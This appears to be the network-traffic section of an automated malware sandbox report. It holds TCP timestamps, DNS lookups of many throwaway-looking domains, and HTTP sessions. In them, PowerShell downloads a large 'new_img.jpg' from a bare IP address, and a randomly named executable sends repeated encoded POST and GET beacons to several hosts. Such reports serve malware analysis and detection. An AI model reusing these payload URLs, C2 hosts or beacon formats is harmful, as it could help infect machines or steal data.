                                                                                        Nov 14, 2024 08:17:19.101917982 CET6349680192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:19.155390978 CET6349680192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:19.936640024 CET6349680192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:20.153789043 CET8063496203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:20.153835058 CET6349680192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:20.153948069 CET8063496203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:20.153960943 CET8063496203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:20.153970957 CET8063496203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:20.153989077 CET6349680192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:20.154026985 CET6349680192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:20.154047966 CET6349680192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:20.154256105 CET8063496203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:20.154289007 CET6349680192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:20.156728983 CET8063496203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:20.156775951 CET6349680192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:20.957840919 CET6349780192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:20.962850094 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:20.969538927 CET6349780192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:20.981636047 CET6349780192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:20.986511946 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:20.986614943 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.645406008 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.645431042 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.645445108 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.645456076 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.645467043 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.645479918 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.645493031 CET6349780192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:21.645523071 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.645534992 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.645543098 CET6349780192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:21.645581007 CET6349780192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:21.645668983 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.645701885 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.645742893 CET6349780192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:21.650427103 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.650502920 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.650567055 CET6349780192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:21.650818110 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.702183962 CET6349780192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:21.762223959 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.762247086 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.762305021 CET6349780192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:21.762322903 CET8063497203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:21.762386084 CET6349780192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:22.485683918 CET6349780192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:23.503323078 CET6349880192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:23.508305073 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:23.508374929 CET6349880192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:23.520235062 CET6349880192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:23.525082111 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.176939964 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.176964998 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.176979065 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.176990986 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.177002907 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.177139997 CET6349880192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:24.177807093 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.177818060 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.177828074 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.177839041 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.177850962 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.177855015 CET6349880192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:24.177880049 CET6349880192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:24.177907944 CET6349880192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:24.182192087 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.182215929 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.182225943 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.182239056 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.182264090 CET6349880192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:24.182291985 CET6349880192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:24.292546034 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.293059111 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.293072939 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:24.293154955 CET6349880192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:24.293241978 CET6349880192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:24.296823978 CET6349880192.168.2.5203.161.46.205
                                                                                        Nov 14, 2024 08:17:24.301656961 CET8063498203.161.46.205192.168.2.5
                                                                                        Nov 14, 2024 08:17:29.377960920 CET6349980192.168.2.5161.97.142.144
                                                                                        Nov 14, 2024 08:17:29.382992983 CET8063499161.97.142.144192.168.2.5
                                                                                        Nov 14, 2024 08:17:29.383133888 CET6349980192.168.2.5161.97.142.144
                                                                                        Nov 14, 2024 08:17:29.398915052 CET6349980192.168.2.5161.97.142.144
                                                                                        Nov 14, 2024 08:17:29.403774977 CET8063499161.97.142.144192.168.2.5
                                                                                        Nov 14, 2024 08:17:30.228550911 CET8063499161.97.142.144192.168.2.5
                                                                                        Nov 14, 2024 08:17:30.228595018 CET8063499161.97.142.144192.168.2.5
                                                                                        Nov 14, 2024 08:17:30.229641914 CET6349980192.168.2.5161.97.142.144
                                                                                        Nov 14, 2024 08:17:30.355688095 CET8063499161.97.142.144192.168.2.5
                                                                                        Nov 14, 2024 08:17:30.357827902 CET6349980192.168.2.5161.97.142.144
                                                                                        Nov 14, 2024 08:17:30.906061888 CET6349980192.168.2.5161.97.142.144
                                                                                        Nov 14, 2024 08:17:31.931884050 CET6350080192.168.2.5161.97.142.144
                                                                                        Nov 14, 2024 08:17:31.937134981 CET8063500161.97.142.144192.168.2.5
                                                                                        Nov 14, 2024 08:17:31.937222958 CET6350080192.168.2.5161.97.142.144
                                                                                        Nov 14, 2024 08:17:31.956199884 CET6350080192.168.2.5161.97.142.144
                                                                                        Nov 14, 2024 08:17:31.961191893 CET8063500161.97.142.144192.168.2.5
                                                                                        Nov 14, 2024 08:17:32.779705048 CET8063500161.97.142.144192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 14, 2024 08:15:39.503536940 CET | 192.168.2.5 | 1.1.1.1 | 0xb738 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:16:08.669564962 CET | 192.168.2.5 | 1.1.1.1 | 0xba74 | Standard query (0) | 241.42.69.40.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Nov 14, 2024 08:16:21.368110895 CET | 192.168.2.5 | 1.1.1.1 | 0xdb18 | Standard query (0) | www.bcg.services | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:16:37.408540010 CET | 192.168.2.5 | 1.1.1.1 | 0x1269 | Standard query (0) | www.alihones.lol | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:16:45.517283916 CET | 192.168.2.5 | 1.1.1.1 | 0xe197 | Standard query (0) | www.5tuohbpzyj9.buzz | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:16:59.675256968 CET | 192.168.2.5 | 1.1.1.1 | 0x539e | Standard query (0) | www.yc791022.asia | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:17:00.672022104 CET | 192.168.2.5 | 1.1.1.1 | 0x539e | Standard query (0) | www.yc791022.asia | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:17:14.830871105 CET | 192.168.2.5 | 1.1.1.1 | 0x3cfe | Standard query (0) | www.nimil.info | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:17:15.827213049 CET | 192.168.2.5 | 1.1.1.1 | 0x3cfe | Standard query (0) | www.nimil.info | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:17:29.315749884 CET | 192.168.2.5 | 1.1.1.1 | 0x5464 | Standard query (0) | www.030002350.xyz | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:17:43.471946001 CET | 192.168.2.5 | 1.1.1.1 | 0x7111 | Standard query (0) | www.nuy25c9t.sbs | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 14, 2024 08:15:39.510452032 CET | 1.1.1.1 | 192.168.2.5 | 0xb738 | No error (0) | raw.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:15:39.510452032 CET | 1.1.1.1 | 192.168.2.5 | 0xb738 | No error (0) | raw.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:15:39.510452032 CET | 1.1.1.1 | 192.168.2.5 | 0xb738 | No error (0) | raw.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:15:39.510452032 CET | 1.1.1.1 | 192.168.2.5 | 0xb738 | No error (0) | raw.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:16:08.677387953 CET | 1.1.1.1 | 192.168.2.5 | 0xba74 | Name error (3) | 241.42.69.40.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Nov 14, 2024 08:16:21.709475994 CET | 1.1.1.1 | 192.168.2.5 | 0xdb18 | No error (0) | www.bcg.services |  | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:16:37.453332901 CET | 1.1.1.1 | 192.168.2.5 | 0x1269 | Name error (3) | www.alihones.lol | none | none | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:16:45.870300055 CET | 1.1.1.1 | 192.168.2.5 | 0xe197 | No error (0) | www.5tuohbpzyj9.buzz |  | 156.232.181.155 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:17:01.035545111 CET | 1.1.1.1 | 192.168.2.5 | 0x539e | No error (0) | www.yc791022.asia |  | 101.35.209.183 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:17:01.035644054 CET | 1.1.1.1 | 192.168.2.5 | 0x539e | No error (0) | www.yc791022.asia |  | 101.35.209.183 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:17:15.850594997 CET | 1.1.1.1 | 192.168.2.5 | 0x3cfe | No error (0) | www.nimil.info |  | 203.161.46.205 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:17:15.850665092 CET | 1.1.1.1 | 192.168.2.5 | 0x3cfe | No error (0) | www.nimil.info |  | 203.161.46.205 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:17:29.375147104 CET | 1.1.1.1 | 192.168.2.5 | 0x5464 | No error (0) | www.030002350.xyz |  | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Nov 14, 2024 08:17:44.107367992 CET | 1.1.1.1 | 192.168.2.5 | 0x7111 | No error (0) | www.nuy25c9t.sbs | b1-3-r11-gmhudx.t9d2quy5.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 08:17:44.107367992 CET | 1.1.1.1 | 192.168.2.5 | 0x7111 | No error (0) | b1-3-r11-gmhudx.t9d2quy5.shop | b1-3-r11.t9d2quy5.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 08:17:44.107367992 CET | 1.1.1.1 | 192.168.2.5 | 0x7111 | No error (0) | b1-3-r11.t9d2quy5.shop | b1-3-r111-s65psj.8uqm5xgy.shop |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 08:17:44.107367992 CET | 1.1.1.1 | 192.168.2.5 | 0x7111 | No error (0) | b1-3-r111-s65psj.8uqm5xgy.shop | b1-3-r11-nff52.alicloudddos.top |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 08:17:44.107367992 CET | 1.1.1.1 | 192.168.2.5 | 0x7111 | No error (0) | b1-3-r11-nff52.alicloudddos.top | b1-3-r111-s65psj.alicloudddos.top |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 08:17:44.107367992 CET | 1.1.1.1 | 192.168.2.5 | 0x7111 | No error (0) | b1-3-r111-s65psj.alicloudddos.top | b1-3-r111-55g56.kunlundns.top |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 08:17:44.107367992 CET | 1.1.1.1 | 192.168.2.5 | 0x7111 | No error (0) | b1-3-r111-55g56.kunlundns.top | b1-3-r111.kunlundns.top |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 14, 2024 08:17:44.107367992 CET | 1.1.1.1 | 192.168.2.5 | 0x7111 | No error (0) | b1-3-r111.kunlundns.top |  | 43.155.76.124 | A (IP address) | IN (0x0001) | false
                                                                                        • raw.githubusercontent.com
                                                                                        • 103.20.102.62
                                                                                        • www.bcg.services
                                                                                        • www.5tuohbpzyj9.buzz
                                                                                        • www.yc791022.asia
                                                                                        • www.nimil.info
                                                                                        • www.030002350.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 103.20.102.62 | 80 | 3292 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:15:33.773324013 CET | 74 | OUT | GET /new_img.jpg HTTP/1.1
                                                                                        Host: 103.20.102.62
                                                                                        Connection: Keep-Alive
Nov 14, 2024 08:15:34.783651114 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 14 Nov 2024 07:15:34 GMT
                                                                                        Server: Apache/2.4.37 (centos)
                                                                                        Last-Modified: Tue, 12 Nov 2024 13:23:05 GMT
                                                                                        ETag: "323a57-626b71e086040"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 3291735
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: image/jpeg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 63422 | 199.59.243.227 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:16:21.732917070 CET | 511 | OUT | GET /f3nk/?X8wps=HD9ptle8L&qb6h=v6+LTBEbPC2R85sFOmmbFC2Q/XGqyVy+lLBawY5mHj8QlUcwrm67JADjHek/seltQEUToGC/qYQit/V96/0oCLxc35by5p8gg2oFcQQLjMbf4RKBZtC51re3Q6vWyy22Hg== HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Host: www.bcg.services
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 14, 2024 08:16:22.358198881 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 14 Nov 2024 07:16:22 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1502
                                                                                        x-request-id: 7d64832a-94e2-4686-a790-0ea942216563
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lJq1bB76E+snwTuRzAQCRTwlHc49zybzlJtRoKPWuKRmkmMWfCsJStswr2UyCHlVmPCMJKPmz7TkvPqFEfwvQA==
                                                                                        set-cookie: parking_session=7d64832a-94e2-4686-a790-0ea942216563; expires=Thu, 14 Nov 2024 07:31:22 GMT; path=/
                                                                                        connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 63487 | 156.232.181.155 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:16:45.898580074 CET | 779 | OUT | POST /c6yl/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.5tuohbpzyj9.buzz
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 205
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.5tuohbpzyj9.buzz
                                                                                        Referer: http://www.5tuohbpzyj9.buzz/c6yl/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 63488 | 156.232.181.155 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:16:48.443821907 CET | 799 | OUT | POST /c6yl/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.5tuohbpzyj9.buzz
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 225
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.5tuohbpzyj9.buzz
                                                                                        Referer: http://www.5tuohbpzyj9.buzz/c6yl/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 63489 | 156.232.181.155 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:16:50.989842892 CET | 1816 | OUT | POST /c6yl/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.5tuohbpzyj9.buzz
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 1241
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.5tuohbpzyj9.buzz
                                                                                        Referer: http://www.5tuohbpzyj9.buzz/c6yl/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 63490 | 156.232.181.155 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:16:53.539083958 CET | 515 | OUT | GET /c6yl/?qb6h=QAykvSbKcm9a/Zd756st6oc0c2ndg18QAahNUeLfrY6eiOHcgN8hz9hRbXFDsZyrs9wVKyWLGfVe8RlZjLvC3xYEXrLC/N5rcVQ70kVg4GEX58Hw+NfPJKYlgF2/w0JeMA==&X8wps=HD9ptle8L HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Host: www.5tuohbpzyj9.buzz
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 14, 2024 08:16:54.485146046 CET | 709 | IN | HTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Thu, 14 Nov 2024 07:16:54 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 566
                                                                                        Connection: close
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 63491 | 101.35.209.183 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:17:01.057511091 CET | 770 | OUT | POST /grmn/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.yc791022.asia
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 205
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.yc791022.asia
                                                                                        Referer: http://www.yc791022.asia/grmn/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 63492 | 101.35.209.183 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:17:03.600801945 CET | 790 | OUT | POST /grmn/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.yc791022.asia
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 225
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.yc791022.asia
                                                                                        Referer: http://www.yc791022.asia/grmn/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 14, 2024 08:17:04.546804905 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:04 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 263
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 63493 | 101.35.209.183 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:17:06.148840904 CET | 1807 | OUT | POST /grmn/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.yc791022.asia
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 1241
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.yc791022.asia
                                                                                        Referer: http://www.yc791022.asia/grmn/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
Nov 14, 2024 08:17:07.326309919 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:06 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 263
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>
Nov 14, 2024 08:17:07.376334906 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 14 Nov 2024 07:17:06 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 263
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 63494 | 101.35.209.183 | 80 | 3720 | C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 08:17:08.688596010 CET | 512 | OUT | GET /grmn/?qb6h=GvVCyhHHBwWm3Wiqs6T1+HSOrEGLSLVs90U44aOn+V5a+alxbue2HRsnEZvT1CUlYqTASXI2DXs3J4l64Md/MUcibXuAbURyjOW4TtuxIV2IutBvJyuUjqtFtGqljQIKAQ==&X8wps=HD9ptle8L HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Host: www.yc791022.asia
                                                                                        Connection: close
